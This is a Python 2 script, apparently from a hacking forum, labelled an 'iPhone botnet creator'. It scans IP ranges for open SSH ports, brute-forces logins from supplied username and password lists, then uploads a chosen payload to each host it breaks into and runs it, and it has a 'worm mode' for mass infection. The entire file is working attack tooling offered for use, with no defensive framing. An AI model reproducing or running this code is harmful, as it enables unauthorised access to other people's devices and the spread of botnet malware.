SSH Scanner

1. #!/usr/bin/python
2. #iPhone botnet creator!
3. #Coded by Freak || Salamander Squad
4. import itertools
5. import threading
6. import paramiko
7. import random
8. import socket
9. import os
10. socket.setdefaulttimeout(0.300) #wait 150 ms before moving to next ip
11. def AttackSSH(ip,userlist,passlist,localpath):
12.     socket.setdefaulttimeout(60) #turn off timeout, this might take long.
13.     print "[+] Attacking IP: "+ip
14.     f=open(userlist,'r')
15.     usernames=f.read().split()
16.     f.close()
17.     f=open(passlist,'r')
18.     passwords=f.read().split()
19.     f.close()
20.     for user in usernames:
21.         for pw in passwords:
22.             try:
23.                 print "[+] Trying "+user+":"+pw+" on "+ip
24.                 ssh = paramiko.SSHClient()
25.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
26.             except:
27.                 print "[-] Connection failed!"
28.                 pass
29.             try :
30.                 ssh.connect(ip, username=user, password=pw)
31.                 print "[+] "+user+":"+pw+" is valid on "+ip
32.                 print "[+] Connected to "+ip+":22"
33.                 while 1:
34.                     try:
35.                         sftp = ssh.open_sftp()
36.                         print "[+] Uploading file..."
37.                         remotepath='upl0ad3d'
38.                         sftp.put(localpath, remotepath, callback=None)
39.                         sftp.close()
40.                     except:
41.                         print "[-] Failed to upload file!"
42.                     try:
43.                         print "[+] Chmodding and executing..."
44.                         ssh.exec_command("chmod +x "+remotepath)
45.                         ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("./"+remotepath)
46.                     except:
47.                         print "[-] Failed to chmod or execute!"
48.                         print "[+] Command sucessful! Output: "+ssh_stdout
49.                 ssh.close()
50.                 break
51.             except paramiko.AuthenticationException:
52.                 print "[-] Failed! on "+ip
53.                 pass
54.     socket.setdefaulttimeout(0.300) #turn timeout back on, resume scanning.
55. def generate_ip_range(input_string): # skidded off of http://stackoverflow.com/questions/20525330/
56.     octets = input_string.split('.')
57.     chunks = [map(int, octet.split('-')) for octet in octets]
58.     ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
59.     for address in itertools.product(*ranges):
60.         yield '.'.join(map(str, address))
61. def Worm(userlist,passlist,ipRange,localpath):
62.     for ip in generate_ip_range(ipRange):
63.         try:
64.             print "[+] Scanning "+ip+":22           "
65.             print "\033[2A" #epic ANSI code :P
66.             s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
67.             s.connect((ip,22)) #Make sure host is up and SSH is open.
68.             s.close()
69.             print "[+] Port 22 (SSH) is open on "+ip
70.             AttackSSH(ip,userlist,passlist,localpath)
71.         except:
72.             pass
73. def Main():
74.     userlist=raw_input("Userlist: ")
75.     passlist=raw_input("Password list: ")
76.     localpath=raw_input("Local path for UPX file: ")
77.     if raw_input("Worm mode? (y/n): ")=="y":   
78.         ipRange = raw_input("IP Range (ex. 192.168.1-2.1-256): ")
79.         try:
80.             print "[+] Started scanning..."
81.             Worm(userlist,passlist,ipRange,localpath)
82.         except:
83.             print "[-] Failed! Critical error!          "
84.             pass
85.         print "[+] Scanning finished!          "
86.     else:
87.         AttackSSH(raw_input("Target IP: "),userlist,passlist,localpath)
88. Main()